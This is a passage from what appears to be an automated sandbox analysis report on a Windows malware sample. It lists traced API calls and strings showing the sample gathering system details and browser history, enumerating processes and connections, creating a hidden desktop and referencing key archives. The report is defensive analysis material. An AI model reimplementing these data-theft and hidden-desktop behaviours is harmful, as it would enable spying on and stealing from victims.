                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E57B7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E57C7
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E57D8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E57EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 012E57F9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 012E5809
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 012E581A
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E5820
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E5843
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E5875
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E5884
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E5895
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E58A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E58BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E58C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E58D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E58E6
                                                                                                                                                                                                                • Part of subcall function 012E4900: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 012E4925
                                                                                                                                                                                                                • Part of subcall function 012E4900: _snprintf.MSVCRT(?,00000104,url%i,00000001), ref: 012E494D
                                                                                                                                                                                                                • Part of subcall function 012E4900: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,774D3490), ref: 012E4987
                                                                                                                                                                                                                • Part of subcall function 012E4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49A9
                                                                                                                                                                                                                • Part of subcall function 012E4900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49B5
                                                                                                                                                                                                                • Part of subcall function 012E4900: WriteFile.KERNEL32(00000000,IE history:,0000000C,012E58F1,00000000), ref: 012E49C9
                                                                                                                                                                                                                • Part of subcall function 012E4900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49D7
                                                                                                                                                                                                                • Part of subcall function 012E4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49EB
                                                                                                                                                                                                                • Part of subcall function 012E4900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E49F7
                                                                                                                                                                                                                • Part of subcall function 012E4900: WriteFile.KERNEL32(00000000,01325C1C,00000001,00000000,00000000), ref: 012E4A0B
                                                                                                                                                                                                                • Part of subcall function 012E4900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E4A19
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,774D3490), ref: 012E419D
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapAlloc.KERNEL32(00000000), ref: 012E41A0
                                                                                                                                                                                                                • Part of subcall function 012E4180: memset.MSVCRT(00000000,00000000,00000C10), ref: 012E41B4
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E4224
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4232
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapValidate.KERNEL32(00000000), ref: 012E4235
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4242
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapFree.KERNEL32(00000000), ref: 012E4245
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 012E425D
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapAlloc.KERNEL32(00000000), ref: 012E4260
                                                                                                                                                                                                                • Part of subcall function 012E4180: memset.MSVCRT(00000000,00000000,00000BED), ref: 012E4270
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E428A
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4297
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapValidate.KERNEL32(00000000), ref: 012E429A
                                                                                                                                                                                                                • Part of subcall function 012E4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E42AB
                                                                                                                                                                                                                • Part of subcall function 012E4180: HeapFree.KERNEL32(00000000), ref: 012E42AE
                                                                                                                                                                                                                • Part of subcall function 012E44D0: memset.MSVCRT(?,00000000,00000124,00000000,00000000,774D3490), ref: 012E4503
                                                                                                                                                                                                                • Part of subcall function 012E44D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,774D3490), ref: 012E450E
                                                                                                                                                                                                                • Part of subcall function 012E44D0: Process32First.KERNEL32 ref: 012E4531
                                                                                                                                                                                                                • Part of subcall function 012E44D0: GetHandleInformation.KERNEL32(00000000,?), ref: 012E454D
                                                                                                                                                                                                                • Part of subcall function 012E44D0: CloseHandle.KERNEL32(00000000), ref: 012E4567
                                                                                                                                                                                                                • Part of subcall function 012E4710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,774D3490,?,?,?,?,012E5903,00000000), ref: 012E475A
                                                                                                                                                                                                                • Part of subcall function 012E4710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,012E5903,00000000,00000000,00000000), ref: 012E47A5
                                                                                                                                                                                                                • Part of subcall function 012E4710: HeapAlloc.KERNEL32(00000000,?,?,?,?,012E5903,00000000,00000000,00000000), ref: 012E47AC
                                                                                                                                                                                                                • Part of subcall function 012E4710: memset.MSVCRT(00000000,00000000,012E5903,?,?,?,?,012E5903,00000000,00000000,00000000), ref: 012E47BF
                                                                                                                                                                                                                • Part of subcall function 012E4710: _snprintf.MSVCRT(00000001,00000001,%S,00000001,?,?,?,?,012E5903,00000000,00000000), ref: 012E480A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012E5913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E5924
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFree$#680CloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32UserValueVariableWindowsZone
                                                                                                                                                                                                              • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                              • API String ID: 1724122771-2715564829
                                                                                                                                                                                                              • Opcode ID: b704a4a710b00d31fee7d81c8b50712889c96b69eac4fa8b853af867c046acf3
                                                                                                                                                                                                              • Instruction ID: 9ec9e8ece222483fe9e3fac88e6393d50092ed6275d2b0e6827c4d6a1f71b29b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b704a4a710b00d31fee7d81c8b50712889c96b69eac4fa8b853af867c046acf3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2A2DC74A91318BEFB20AB94CC4AFEE7B78EF45B05F504149F600BA1C0D7F46A458B69
                                                                                                                                                                                                              Function 012ED300 Relevance: 103.7, APIs: 55, Strings: 4, Instructions: 429windowsynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 012ED35F
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 012ED36A
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012ED37D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 012ED392
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 012ED3A1
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,-00000008), ref: 012ED3AD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012ED3BC
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012ED3C7
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012ED3DA
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 012ED418
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012ED428
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012ED437
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 012ED44F
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 012ED459
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32 ref: 012ED46F
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 012ED47F
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012ED4B7
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012ED4BA
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012ED4CE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 012ED533
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 012ED55D
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 012ED569
                                                                                                                                                                                                              • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 012ED585
                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 012ED5AA
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F4,?), ref: 012ED5BC
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012ED5C5
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012ED5D4
                                                                                                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 012ED5DB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 012ED5EF
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 012ED613
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 012ED620
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 012ED630
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000DE), ref: 012ED64C
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000F2), ref: 012ED655
                                                                                                                                                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 012ED661
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 012ED67B
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012ED6A4
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012ED6B3
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012ED6C6
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012ED6E9
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 012ED707
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 012ED714
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012ED723
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012ED73B
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 012ED2BC
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: GetCurrentThreadId.KERNEL32 ref: 012ED2C4
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 012ED2D0
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 012ED2E1
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 012ED2ED
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 012ED748
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?,000000EB), ref: 012ED7B7
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000), ref: 012ED7BE
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012ED7CE
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012ED7E8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 012ED7FD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 012ED80C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 012ED818
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012ED827
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 012ED82E
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 012ED843
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                              • String ID: '$<$P0Mw$static
                                                                                                                                                                                                              • API String ID: 2592195760-98485823
                                                                                                                                                                                                              • Opcode ID: 89fb34e8fa0de185e023d977082ffff5238de943ee3e141a7b670eb3e4e72ed1
                                                                                                                                                                                                              • Instruction ID: 72f65e81bfa0df118a64db226a3297ad13c4167ce664bb2ba02e6f0d1d07f416
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89fb34e8fa0de185e023d977082ffff5238de943ee3e141a7b670eb3e4e72ed1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21E19271214305AFD734AFA8EC88FAA77BCEB89722F60461CF615E72C8C77495418B61
                                                                                                                                                                                                              Function 012E95B0 Relevance: 80.8, APIs: 41, Strings: 5, Instructions: 320sleepprocessthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01304F20: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 01304F50
                                                                                                                                                                                                                • Part of subcall function 01304F20: GetProcessHeap.KERNEL32(00000008,00000110), ref: 01304F69
                                                                                                                                                                                                                • Part of subcall function 01304F20: HeapAlloc.KERNEL32(00000000), ref: 01304F6C
                                                                                                                                                                                                                • Part of subcall function 01304F20: memset.MSVCRT(00000000,00000000,00000110), ref: 01304F80
                                                                                                                                                                                                                • Part of subcall function 01304F20: RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 01304FA0
                                                                                                                                                                                                                • Part of subcall function 01304F20: RegCloseKey.ADVAPI32(?), ref: 01304FB0
                                                                                                                                                                                                                • Part of subcall function 01304F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01304FC1
                                                                                                                                                                                                                • Part of subcall function 01304F20: HeapValidate.KERNEL32(00000000), ref: 01304FC4
                                                                                                                                                                                                                • Part of subcall function 01304F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01304FD1
                                                                                                                                                                                                                • Part of subcall function 01304F20: HeapFree.KERNEL32(00000000), ref: 01304FD4
                                                                                                                                                                                                              • CreateDesktopA.USER32 ref: 012E960F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 012E962A
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000040), ref: 012E9638
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32 ref: 012E9670
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,00000000), ref: 012E9692
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 012E96B1
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E96BD
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 012E96D2
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E96D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,000000FF), ref: 012E9701
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E9713
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,000000FF), ref: 012E972D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E973F
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 012E9745
                                                                                                                                                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 012E9756
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 012E97EE
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000040), ref: 012E97FF
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32 ref: 012E983D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,00000000), ref: 012E985F
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 012E9881
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E988D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 012E98A2
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E98A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000024), ref: 012E98D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E98E1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000024), ref: 012E98FB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E9909
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 012E990F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Window$Heap$CloseDesktopProcess$InformationPathShell$Creatememset$AppendFolderSleepThread$AllocFindFreeOpenQueryValidateValue
                                                                                                                                                                                                              • String ID: 9e2b3b2da$D$D$Shell_TrayWnd$explorer.exe
                                                                                                                                                                                                              • API String ID: 3365957849-896784329
                                                                                                                                                                                                              • Opcode ID: ccdcc9732e4aefd8d475d16aad0e8d88f65ed4cbe0fea9d8d82f02791a012f72
                                                                                                                                                                                                              • Instruction ID: d4121e38083e0c93d43c525f7288eb732fb4268add1cff49fd39a9e25e0cfa18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccdcc9732e4aefd8d475d16aad0e8d88f65ed4cbe0fea9d8d82f02791a012f72
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BB16FB15143429FDB30EF69D888A6BBBECFB88318F44492EF659C2144D7B48945CF61
                                                                                                                                                                                                              Function 01302BB0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 379COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 01302BCE
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 01302BE8
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 01302C12
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01302C37
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 01302C77
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01302C81
                                                                                                                                                                                                              • #680.SHELL32 ref: 01302C89
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 01302C9A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01302CA1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 01302CE4
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000), ref: 01302D30
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435,00000000,00000000), ref: 01302D77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorFileLastmemset$#680AttributesCreateCurrentFolderMakeModuleNameSystem
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                              • API String ID: 581088870-2360470718
                                                                                                                                                                                                              • Opcode ID: 6efafbbbe6e82d3e5ca3dbd0d52e6f5b15ff52e07b392b2f712c724e2431c999
                                                                                                                                                                                                              • Instruction ID: 699a97aca12aadf1d491ad508cb1117c5ec720dab1e468a200fb42c62a674588
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6efafbbbe6e82d3e5ca3dbd0d52e6f5b15ff52e07b392b2f712c724e2431c999
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3D116305042458FDB33DF28D86CBEB7FE9AF45308F148198E989D7285DBB19988CB90
                                                                                                                                                                                                              Function 012E3A20 Relevance: 61.8, APIs: 22, Strings: 13, Instructions: 514threadmemorynativeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E3ACA
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 012E3B33
                                                                                                                                                                                                              • SymSetOptions.DBGHELP(00000006), ref: 012E3B48
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 012E3B58
                                                                                                                                                                                                              • SymInitialize.DBGHELP(00000000), ref: 012E3B5B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 012E3B9A
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 012E3C27
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00001000,ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X,?,00000000), ref: 012E3C47
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000009,?,00000004,?), ref: 012E3CD4
                                                                                                                                                                                                              • ZwQueryInformationThread.NTDLL(00000000), ref: 012E3CDB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 012E3D20
                                                                                                                                                                                                                • Part of subcall function 01305460: VirtualQuery.KERNEL32(01305460,?,?,?,?,?,012E3BC8), ref: 01305488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ThreadStart = , xrefs: 012E3CF8
                                                                                                                                                                                                              • dd;MMM;yyyy, xrefs: 012E3E8B
                                                                                                                                                                                                              • Self exception = TRUE, xrefs: 012E3C8D
                                                                                                                                                                                                              • sysinfo.log, xrefs: 012E3F78
                                                                                                                                                                                                              • scr.bmp, xrefs: 012E3FF8
                                                                                                                                                                                                              • HH;mm;ss, xrefs: 012E3EB2
                                                                                                                                                                                                              • main, xrefs: 012E3BEE
                                                                                                                                                                                                              • ExceptionAddress = , xrefs: 012E3B68
                                                                                                                                                                                                              • debug_%s_%s.log, xrefs: 012E3ED4
                                                                                                                                                                                                              • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 012E3C3E
                                                                                                                                                                                                              • DEBUG, xrefs: 012E404D
                                                                                                                                                                                                              • csm, xrefs: 012E3A45
                                                                                                                                                                                                              • CallStack:, xrefs: 012E3D58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                              • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 2913300210-1369666974
                                                                                                                                                                                                              • Opcode ID: 717ee762f334e2970d078c7f1154bea23cb61ef7fd88319f4a77a2a0366f0458
